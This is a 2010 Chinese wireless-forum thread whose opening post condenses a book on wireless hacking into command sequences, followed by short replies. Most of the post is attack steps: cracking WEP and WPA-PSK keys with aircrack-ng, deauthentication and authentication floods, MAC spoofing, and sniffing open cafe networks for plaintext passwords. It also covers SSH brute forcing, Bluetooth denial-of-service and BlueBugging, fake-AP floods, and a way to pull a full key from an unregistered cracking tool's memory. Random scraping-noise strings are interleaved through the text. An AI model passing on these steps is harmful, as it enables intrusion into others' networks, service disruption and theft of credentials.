搜索
格西欧解决方案
树熊
查看: 9184|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3715

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
% n' r" r; W4 t( t3 @1 m  S- r' s' ?( W' Z) N# D9 x
以下所有操作均在BackTrack 4中进行。
% B* ^3 }" T3 |2 ^0 |0 C
6 I0 K! C0 [# X0 N3 _: W
) Z; N& I* o0 T& l1 D  S无线WEP加密P解:
7 V+ e# l+ H/ E8 ]: w$ M
, B& s  u% @& O" s/ V注入P解:
  O; O5 F$ Q% u7 e. X! a: M1 d: c
; m1 c  X: ~, B1 wifconfig
2 F: t3 {4 I$ D0 x* q: `8 {9 b& W- K: C- ]
ifconfig –a! S; n, r, p( @
: O# v- N2 g" c/ C
ifconfig wlan0(无线网卡) up
7 `" ?1 _  w, z: Q: [, Z/ Z  _6 b  o
9 T$ u. \3 d0 R; w& t# Wairmon-ng start wlan0
3 f4 v; j' o4 b$ L, m/ O6 r6 s) M2 I- p: N1 B
airodump-ng mon0
/ T1 K  _4 T$ C$ `4 I9 w4 J
' n& Q% X  m0 u( W- O) Q1 Zairodump-ng --ivs –w ivsfile –c 频道 mon0或2 m# T3 P: Q( H& @: o
. l- S0 g1 s7 H1 l; t
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
4 ?. m5 X- t1 L7 f1 o
6 `  A- N9 p* @4 {. Z% a1 Haireplay-ng -3 –b BSSID –h Station mon0
- [9 L0 Z5 Q0 Y1 j' v" F
0 I: _+ d9 ^$ {2 g- Waircrack-ng ivsfile-01.ivs$ |  {# Z4 N' d. g1 C: L, x2 C

3 ]4 K; U; D: \* C) T% y$ f* l. v虚连接P解(适用于无客户端连接APP解)
0 z: q* s  C7 D# m) d# N: d
3 ?8 U# `# b% D- K+ k8 Aifconfig* s/ O+ K1 X  M1 L; H+ ?
4 R% _6 [, n, m) i
ifconfig –a
/ Z+ q3 M. A$ `; }& z# O3 q( H4 W) |/ Z% r+ G$ {; A
ifconfig wlan0(无线网卡) up. z+ Z/ P6 M5 Q/ j% }! L: o

" f  b4 ^# l- ?" h' B4 `; Q0 cairmon-ng start wlan0( |0 l. k! j6 f; Z  o

' h! x6 O5 `2 b+ ]+ d" Zairodump-ng mon0
7 u% h# T* ?( _4 T. v, h" ]4 A- k0 g6 P3 m& a# L, u% F. q
airodump-ng --ivs –w ivsfile –c 频道 mon0或
* D7 W0 P. ?+ j* L! ^
5 a! f2 J+ Z' L* I" ^& w- kairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
3 h6 M9 v( g% \- o) I  c8 ^- y6 E# m  }" z8 Q+ @: s/ W
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
3 P3 J7 L& [$ b2 T+ \
8 F0 q# G4 \4 g3 K6 C  b0 Qaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon00 x/ O: x( r5 h2 U9 Y8 e
& m- h. P9 X4 O3 B
aircrack-ng ivsfile-01.ivs: P* \' H$ w: |) v+ A$ r
5 D$ W* i6 L9 \+ h0 |# S
7 X0 e3 G. g, D! U1 Q: `# }/ @% Q4 f
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。# p# ^1 L  u8 E6 _5 A7 O) w8 J

1 X+ U5 v( T2 @2 m6 |. r* G6 Z; d+ q
1 C" y# N+ [: m% D" i' `4 q  C/ iWPA-PSKP解
% @; Q1 A! {7 Q2 I$ o; Y# d2 I/ D+ I$ M4 N7 O8 m
ifconfig
% X7 s- _2 n( R# l2 B7 R2 m& d4 q" @8 |/ {
ifconfig –a
& M1 R' J1 k8 h" x0 U9 _; j
# M- O6 k$ t' w& aifconfig wlan0(无线网卡) up
" r% H3 s6 K0 x2 r" [1 ]
- W: B( ~/ m) M5 I) h$ y( @airmon-ng start wlan0: p- k; p7 [2 Q$ n9 D

% w4 M$ ^# S! @3 x, Cairodump-ng mon0) b1 U# Z' B! w; u2 L
4 n4 i+ J1 v3 m. Q  f/ f5 @6 X4 P
airodump-ng –w capfile –c 频道 mon0
( |+ G) D4 o' w( s- W9 S% \2 n' S8 H! u& Z
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包9 H& L3 ^" u' \& J! R, V/ g0 }4 x; t
" q4 b! }- _! i' H
aircrack-ng –w Dic capfile-01.cap或6 n% l# T0 E" |2 ]0 z2 Z

% d* o" c& B  c& E5 Lcowpatty –f Dic –r capfile-01.cap –s SSID0 f% q; I/ e1 n4 p$ Q: J2 H
8 h" y5 b" y5 b/ c! m
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID* v- Z( {0 N/ S) V

1 s. o% C9 e. ^$ e' w. K/ P$ @( c傻瓜式P解软件SpoonWPA。
2 @3 d0 k! w7 i+ _7 G" h- L" k. G2 W8 ~7 j3 D8 k
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst# D/ s% v" @9 t$ V4 \0 T+ F# l, x

" i; c  s$ o8 o$ V5 D! l6 Z. m7 k- Z& W: i9 g) N, @/ C" I: U
字典文件的生成和上传( J, [/ X/ v* x( H
5 g3 _" x, R- d* j
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。# [- U8 [+ h, y' V! e1 ^

1 J& Y" v% o8 {9 R5 M6 i2 a- x5 O. K; p
BT4下开启Tftp:Services—TFTPD—start TFTPD
) D% f; @1 J7 a7 L; i' V8 k. N7 q
' @' ]' d# R, a/ H( Y+ A2 q在Windows的CMD中运行 tftp –i IP put **.dic
+ q  r& d2 ~: S  \) z7 {1 ?
* S9 `' w/ I9 B# L- @) k+ i# r0 t% h
$ i( Q# M0 ^* y  {8 v$ [0 m7 LBT4下开启SSH:Services—SSH—start SSH; @$ Z) v1 D7 ?6 W  M
+ u/ e& ~) Q; u
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
3 i  ^8 f& u* F+ G2 J6 Q* [$ x/ z
- N: l/ @# k8 m# G4 V* G. X8 o  O% n: }
AP限制MAC时的解决
9 |+ U5 E6 E9 V3 C/ }* E( \( b3 n% ~' P, B
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
* ]/ U+ m4 B5 C5 ]+ p8 U$ _- @* o' i9 |7 ]* G" S, k1 ?) g
ifconfig wlan0 hw ether NewMAC
: U3 ?$ M. ^- d; S& k  d
+ K9 u; T, `7 p* {) X7 J' X
$ N; G4 e) t. h关闭SSID广播的AP探测:
$ `  c$ Q8 m: J+ R+ ^! J9 D/ P/ O( S$ e6 N" f1 b
1.     Deauth攻击:) Q3 G* c7 r7 N+ ^/ }

4 }! X3 Z1 {- \, Dairodump-ng mon0
' e' d& g1 t/ k( d$ s9 @* ~# N1 j5 o% x& T
aireplay-ng -0 10 –a BSSID –h Station mon0+ `1 D) ?1 X# W
/ B! q8 z0 l5 U6 n$ T; P& l$ t3 H5 ^
2.     抓包分析0 K4 L+ z  {' D. q. ~
: X0 M3 O: L( o+ H) s; X, `
Omnipeek  j2 \. z. i3 ?! P

+ p8 ^3 z% `1 I' ITcpdump –n –e –vvv –i 网卡名1 c& g- [* f. I, u& }

, [$ M: l7 e) j# m3.     暴力P解/ Y/ R' w) d: m  ]4 d
3 h9 H6 Y/ ^5 R. n7 j
Charon 1.1暴力P解
2 O1 F# N% i5 \9 o: V' y' T7 @& c4 _0 ]
( p5 f4 B& z& f" z- J9 M
无线加密数据包的解密7 r2 F0 p' X$ [; S
2 d2 c/ O+ F2 T2 h2 v. e  _- ^, ~6 X
0 w9 W! b) M$ J0 `1 j
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
5 D/ [9 W6 q3 _1 j  W' s* }
9 `7 h; {, o0 |. y1 V# pFilterNS     DNS解析数据包
, C0 P1 a7 |% {
/ _. E/ J6 s/ @/ B3 z! T. s8 ?* vFilter:HTTP    WEB访问数据包; b* ^4 E5 `3 d$ p
  Q9 ?. U  C  K4 I5 j$ k& V
Filter:msnms   MSN
* ]. C( q* r6 G# A% Q( Q/ o" O8 I  o- G# G# W
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
! U4 e" b8 m, O1 I  r: M
! T& k4 O. A  z: h* e: ?8 v; a; j使用airdecap-ng解密:2 a1 r6 c8 u6 ?
. Y& ?) W3 L) [  C$ J
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
- c( q5 J: Z4 K9 e& j- {
: O' _3 a" s5 a, K; r& m4 u  R: W$ K! b1 W) T0 ^
咖啡馆中无线数据截取(开放式无加密AP)8 s- ?: Z  |# f- q) S

) M7 K" b" H3 m$ z6 D$ }4 t0 b1.Airodump-ng –w data –c频道 mon0( W, r6 h* y+ x: z; G' k; ?- D
1 _$ A4 `7 J, w2 N) U, @1 z8 T! r
2.使用WireShark打开分析
+ l% J+ [1 \# [! e* V1 z, t' k! K; L: n6 l5 e

  k6 v4 H  C6 j" NBT4下的渗透工具:( X+ C9 G0 j/ S; ~* J

4 M! C: ?$ r% H/ Y) c0 `nmap –sP IP/24        判断C段下存活的主机
" V* B+ h; F/ _+ j; V0 R  E( N; @% R6 X- w9 d; V0 n
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放( E, d: ^8 W) S+ \2 }: s+ `

7 x7 v( w9 {5 n$ J* Knmap –vv –sV IP –p port   指定端口的详细信息。。。% X" }; E/ }" m* X; S

8 D% ^, g. P6 _9 rnamp –O IP/24    判断主机的系统版本
! V, Y$ g0 A) @, x# c# A. q6 i; H- s+ y2 u
. v! K$ ?/ v7 K  z" k
GUI 版nmap:Zenmap
: e& g& r% B* s, x2 Z5 u. V% Z# E; ~1 i
8 F# B5 @# l$ d. M1 ~
Amap使用:amap –B IP port+ a% F; O8 Y; x" v' J
& _: [& n/ n% T$ I
Nbtscan(扫描Windows网络NetBios信息):$ C0 W4 [1 G& T

+ o" \/ c2 N+ l+ `nbtscan –v –s : IP/24
# R! ~* g1 a# y( J
( P( q# W2 U6 t2 i3 X/ w( dnbtscan –r IP
/ T7 Y& _* S0 t/ m
8 g+ L! m4 W/ w/ U7 m8 X8 F2 }3 L. `  _7 J- v6 r9 v; c
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
" R8 A& B. j; c, g8 I. f6 k
2 t" f6 Y" P0 ^) q" {  @  O) W7 N6 N$ E0 A4 S* ?1 z
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)2 l6 `& E! U  B, N4 \1 T! L" N

, E/ }: [& D1 q, PBruteSSH: ./bruthe.py –h IP –u Username –d Dic
* K% X2 \  M8 `- _9 Q* l# x1 x; N& i6 M
Metasploit3使用
0 K- L& t% i  k$ w1 N无线D.0.S
' Y) O1 d* L5 C  g; b2 W, i7 {5 _8 z0 y+ K( K4 s* t* ?4 q& W
) u/ c/ ]( }9 c6 H8 q
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)* J( f8 E+ e  ^) B5 W$ z3 H1 H3 ~+ t

) ^. ?  T! v8 y- C+ R0 Mairmon-ng start wlan0
2 g0 D, B: G) W  X9 {7 g! W- k: M  m7 B! E
airodump-ng mon05 q1 H% ^, W9 T8 n4 m( {( d
- u9 ~) s8 M' E1 v2 b7 {
mdk3 mon0 a –a BSSID
# h0 T4 c2 R4 b3 ]! _  a9 f  v; J& q9 D$ D4 D% Y+ j
对所有的AP攻击:mdk3 mon0 a( @. x) Y9 g# t& H; ~1 L

4 C. i" K* f7 x8 T2 b9 q( S) d( T  ?$ J. Z$ v3 {
Deauth Flood 攻击# t" z' |0 B7 f9 o, q+ P" A1 R

1 d5 u# o3 o+ fmdk3 mon0 d –c Channel
! L* k) a" M3 G' A) ~7 n8 j
4 i7 d  ]) |0 Q0 ]图形化D.O.S攻击:Charon5 L# A/ E/ k) @9 ?4 h  u
, w2 P8 Z3 j( b4 M1 r

: P+ @/ y% O1 f7 a$ B7 T当受到攻击时,使用Wireshark抓包可以看到异常信息。
- D/ c+ |5 Q" O! c8 U: Y- }  E. d# ]9 o, m! u/ x7 I

1 c1 V) K' L9 u5 nWPA-PSK高速P解" I! p. D& i  ~3 r: d5 W$ {
$ R' l3 L% [+ F( Q4 d8 \
1.       WPA-PSK PMK Hash TablesP解1 N* T& r! C. X0 w" j

1 @/ T/ D' E  h' o( n8 I" F4 V" h4 cCowpatty –d HashTable.hash –r ***.cap –s SSID; `9 h  x% z. F# a( h2 t
: o! i* ?5 r( u1 R) R1 W: N8 Z
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID( o+ U$ N$ H( I' y7 ?1 T5 M. H
: d2 Q  B3 f" K) |" B- W
2.       GPU辅助高速P解  R: r! C5 z6 b! @2 c1 C; U5 o
- h4 {+ b$ N% b6 V# A( j
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。- n, ?4 W7 u! B# ~
3 Y7 m/ P  A8 A" c
3.       分布式P解
) X) a- y+ x* s) ^& k. {) [- p$ {" d" y. J; b6 f
  G& z0 v2 Z, r) z8 X) a5 u! R2 Y, ^
AP的伪造/ m4 v- X+ u; E( r/ a( O

0 a2 p2 `9 B( X& J6 h- Z. x把AP的MAC改成目标AP的MAC
" `9 o# G7 z: X6 d: |3 X# _; j* T1 @3 P0 b7 {/ O/ I- D. K) j
网卡软AP, r& d- H: [# y. Z" d$ U! m

. `6 U+ {' A, J2 f- k3 d% g
+ Z& B' _! z# b# P$ U# a伪造大量虚假AP信号:
0 |: F: W" N/ x0 v( G& e6 d
4 x" ^8 ?1 U, G8 ~% i9 I. y随机SSID:mdk3 mon0 b –g –c 频道
" Q. c! K! i& Q5 K9 y) Q' _* l  a# M6 F) m5 l6 m- e. r5 P2 X
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
& s8 [4 @" t5 M4 [, ~1 j' Z2 _, Q# D, ?% I2 J7 P" t7 Q$ ^

% X  L. N4 |9 [  I( |War-Driving
: M# H% K- J3 t% m! t+ Z2 C1 v# _# C
热点地图绘制; n3 N+ D! C2 J6 K5 C2 r9 Z5 F
8 ?  y, q$ w, a$ y( E' E
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
: v3 D( }7 u! m0 N
' J. ^! E# W! s# K1 ]4 \- j/ z4 e8 ^4 I. e, J- e/ k
Netstumble# M. }1 e) ?* W' Z) t5 ]
9 q4 l" Z: S7 [2 b2 o, D
; ], S  d# Z7 |5 \' E, w. W
蓝牙Hacking
1 Z/ B5 Q- P( V8 T3 O4 ]
3 E% ]/ y% g9 x4 tWindows下的Blue Soleil工具
5 _8 R; F. R; E  V- H' E5 L( K  {" A0 a* e( Q0 n
BT4:$ v) R/ ^5 ~* m& u, F1 f' H

# }5 V/ ?% V5 I" N2 _hciconfig 查看蓝牙适配器
/ v/ ^( b' ^7 v* n  y2 m9 s" _# `* y) \/ C
hciconfig hci0 up 载入蓝牙适配器
8 ?1 T/ n  u. I
' ^$ L; z2 c" f) phciconfig hci0 class 蓝牙适配器详细信息
; C) y4 |7 k. A1 {6 J% N  L  z! z( b7 K* h/ ~3 c7 `( b
9 ~8 f. n% r" k" [
hcitool(扫描蓝牙)
) X+ b$ n1 i% u# b
$ G- }; u: d, O6 B; @hcitool –i hci0 scan
* T  l# K% w5 W2 H! x/ \% ^; l/ }5 l" N% A5 M
BTscanner(扫描蓝牙)/ K4 \5 I: H3 I% I( L) K

+ j$ u. I7 u/ L9 A' e
$ s+ G4 N! d0 }" ^4 h" B蓝牙攻击:, w& B8 P& i/ g1 ~. N

( o- f* S3 a; a' L7 QBlueBugging (适用于BlueTooth V1.1的手机)
  x$ m6 R: d; W. E) Z7 Z0 a9 h- |8 F& G5 [% r7 V+ R
Bluebugger工具:7 V9 e) C6 o( u

) t7 O: f& _- p9 WBulebugger –a HD_Addr info
) l+ e2 R9 M: i, M4 T. l! Z3 u6 k$ C/ Q, N& B$ O
  }: R  f  X' ?6 a1 X1 ?0 z3 O
BlueJacking' f+ [  V5 z  I
$ C- m' j' |! L( p
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
( F$ y/ o1 D' E4 ^8 e% V; z& x! H& Z! I5 ~+ Z, j0 u
) f) [4 {' r& H; e6 y
HD_Addr修改:
+ F1 r) S  `9 ?! _
7 O$ l( w6 p) ~7 g, |6 V' ~Bdaddr工具
/ g7 D% W) f9 U' p' r7 I
; c% E# C+ W( T. Y7 b0 C# m# Wbdaddr –i 蓝牙设备名 新HD_addr% t& S& b+ C7 X" w, e6 u

, g8 y. z6 m+ Q* |4 W
! r( u2 A/ G8 @$ A5 U6 {& F" H蓝牙D.O.S
1 O/ o! t8 J) f" L% R7 N
$ [( b8 r' ~9 f( a% L1 cl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务; |/ j& t/ ?( ~- S. C2 A! B
: \7 s0 [; [2 \' y( M" Z+ _+ X
hciconfig
) L/ y! M* j' I. Y( m5 y, v6 q! {+ b
hciconfig hci0 up
8 _+ y+ Q. Q: n9 @* n. M
* o$ B7 @- o# hhcitool –i hci0 scan
  ]9 R- v) B' H+ K$ k. c6 x; U. p2 c7 `" Y' m0 E: L+ k9 |
l2ping –s 10000 –目标MAC: k& `2 d2 {1 O5 }5 p

/ l! E9 R  {# F6 Y$ P- a* Y' [$ b0 B) g: H& H8 \8 t- Y
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)5 b9 |8 u* g: \

  K1 f4 m  S/ I! d./fang –r ************-############ -s
# X  J+ j! j6 x9 q3 V: g/ p! D7 u, I5 `
暴力P解************-############的蓝牙设备
$ n$ A% ^7 D0 q" s5 k) a. G6 I; ?+ X+ x8 O7 r+ y
./fang –l 各厂商BD_Addr分配0 D% o0 S7 r" Q+ L* h* I5 Y2 ]

6 c' Y4 F) r9 x8 E; x3 @( l; P5 b9 a$ m/ g' X! p
WifiZoo使用" y5 T$ b6 C4 j3 Y; h7 e

# t( M0 m( I$ f% l4 O  C./wifizoo.py –c Capfile
4 b3 A- C2 I9 ?! n9 o! G, F, y! c# Z0 ]% ?7 x* n; L
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

710

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
' Y" W" v7 O8 ?8 K* J4 \( X: E8 o: W借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
4 h5 b( Q: h7 \0 {8 i; Y2 ~! R呵呵 其实也不贵 21块 快递再一点
6 g% \7 ?4 L7 o& H1 T+ r我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2015-1-28 17:09 , Processed in 0.200356 second(s), 35 queries , Gzip On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表